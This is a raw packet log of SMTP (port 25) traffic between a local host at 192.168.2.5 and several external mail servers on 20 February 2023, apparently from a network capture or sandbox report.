Feb 20, 2023 09:50:48.399262905 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.399332047 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.404571056 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.404707909 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.423692942 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.423952103 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.425867081 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.425951004 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.426124096 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.426177979 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.431512117 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.431670904 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.452900887 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.452963114 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.453025103 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.453087091 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.458417892 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.458549976 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.479767084 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.479830980 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.480014086 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.480139971 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.485346079 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.485539913 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.486037970 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.486313105 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.506757021 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.506799936 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.507080078 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.507287025 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.512242079 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.512504101 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.533636093 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.533744097 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.534001112 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.534193993 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.539159060 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.539470911 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.548666000 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.549187899 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.560589075 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.560723066 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.560823917 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.560988903 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.566160917 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.566391945 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.587480068 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.587538958 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.587655067 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.587760925 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.593086004 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.593342066 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.612092018 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.612580061 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.614068031 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.614252090 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.614289045 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.614442110 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.620007038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.620223999 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.640850067 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.641022921 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.641184092 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.641423941 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.647011042 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.647332907 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.668030024 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.668119907 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.668327093 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.668567896 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.673981905 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.674241066 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.674410105 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.674870014 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.695063114 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.695103884 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.695323944 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.695502996 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.700954914 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.701152086 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.721980095 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.722071886 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.722356081 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.722619057 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.727854967 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.728154898 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.736933947 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.737448931 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.749133110 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.749197006 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.749420881 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.749639034 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.754874945 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.755157948 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.776168108 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.776248932 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.776411057 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.776518106 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.781857014 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.782042980 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.799547911 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.800138950 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.803150892 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.803201914 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.803445101 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.803575993 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.808733940 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.808916092 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.830152988 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.830212116 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.830470085 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.830656052 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.835660934 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.835912943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.857258081 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.857314110 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.857755899 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.857873917 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.862571955 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.862759113 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.862895012 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.863320112 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.884469032 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.884536028 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.884744883 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.884943962 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.889602900 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.889897108 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.911422014 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.911545038 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.911670923 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.911812067 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.916562080 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.916757107 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.925481081 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.926017046 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.938402891 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.938468933 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.938678980 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.938900948 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.943581104 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.943813086 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.965343952 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.965399981 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.965593100 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.965704918 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.970674038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.970926046 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.988954067 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.989490986 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.992356062 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.992413044 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.992511988 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.992646933 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.997654915 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.997833967 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.019247055 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.019357920 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.019457102 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.019648075 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.024650097 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.024992943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.046103001 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.046130896 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.046498060 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.046610117 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.051834106 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.052083969 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.052354097 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.052666903 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.073076963 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.073122025 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.073391914 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.073601007 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.078758001 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.079092026 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.099911928 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.100128889 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.100131989 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.100305080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.105907917 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.106178045 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.114864111 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.115381002 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.126662016 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.126873016 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.126883984 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.127049923 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.132858038 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.133140087 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.153523922 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.153573036 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.153805017 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.154027939 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.159797907 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.160028934 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.178594112 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.179173946 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.180386066 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.180522919 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.180660963 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.180824041 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.186651945 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.186944008 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.207214117 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.207333088 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.207629919 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.207640886 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.213663101 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.213902950 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.222243071 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:49.232901096 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:49.234354019 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.234397888 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.234606028 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.234766006 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.240571976 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.240778923 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.241004944 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.241453886 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.261215925 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.261296988 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.261682034 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.261780977 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.267559052 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.267808914 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.288292885 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.288336039 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.288785934 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.288917065 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.294445992 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.294732094 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.303664923 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.304213047 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.315382004 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.315427065 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.315726995 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.315969944 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.321460962 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.321676016 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.342407942 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.342468977 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.342655897 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.342787027 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.348438025 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.348640919 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.367037058 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.367593050 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.369277000 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.369452953 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.369555950 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.369734049 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.375343084 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.375566006 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.396096945 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.396198988 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.396518946 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.396680117 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.402239084 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.402510881 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.410778999 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:49.411053896 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:49.423079967 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.423243046 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.423439980 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.423610926 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.429141998 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.429434061 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.430358887 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.430773973 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.450181007 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.450237036 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.450493097 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.450722933 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.453527927 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:49.456104994 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.456279039 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.477216959 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.477400064 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.477467060 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.477665901 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.482865095 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.483159065 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.493103981 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.493566990 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.504048109 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.504177094 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.504307032 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.504529953 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.509907961 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.510226965 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.530936003 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.531059027 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.531157017 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.531236887 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.536946058 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.537107944 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.550041914 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:49.556190968 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.556663990 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.558213949 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.558269024 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.558407068 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.558538914 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.562073946 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:49.564591885 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.565144062 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.587682962 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.587754965 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.588013887 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.588203907 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.592732906 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.593015909 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.616592884 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.616626024 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.617053986 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.617178917 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.621504068 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:49.621625900 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.621979952 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:49.622283936 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.643701077 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.643739939 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.643934965 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.644105911 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.646835089 CET	25	49711	198.252.153.129	192.168.2.5
Feb 20, 2023 09:50:49.648866892 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.649069071 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.649921894 CET	49711	25	192.168.2.5	198.252.153.129
Feb 20, 2023 09:50:49.666949987 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:49.667105913 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:49.668359995 CET	25	49707	209.51.188.92	192.168.2.5
Feb 20, 2023 09:50:49.668473005 CET	49707	25	192.168.2.5	209.51.188.92
Feb 20, 2023 09:50:49.670490980 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:49.670650959 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.670738935 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:49.670898914 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.675848007 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:49.676042080 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:49.684705019 CET	25	49713	94.100.180.31	192.168.2.5
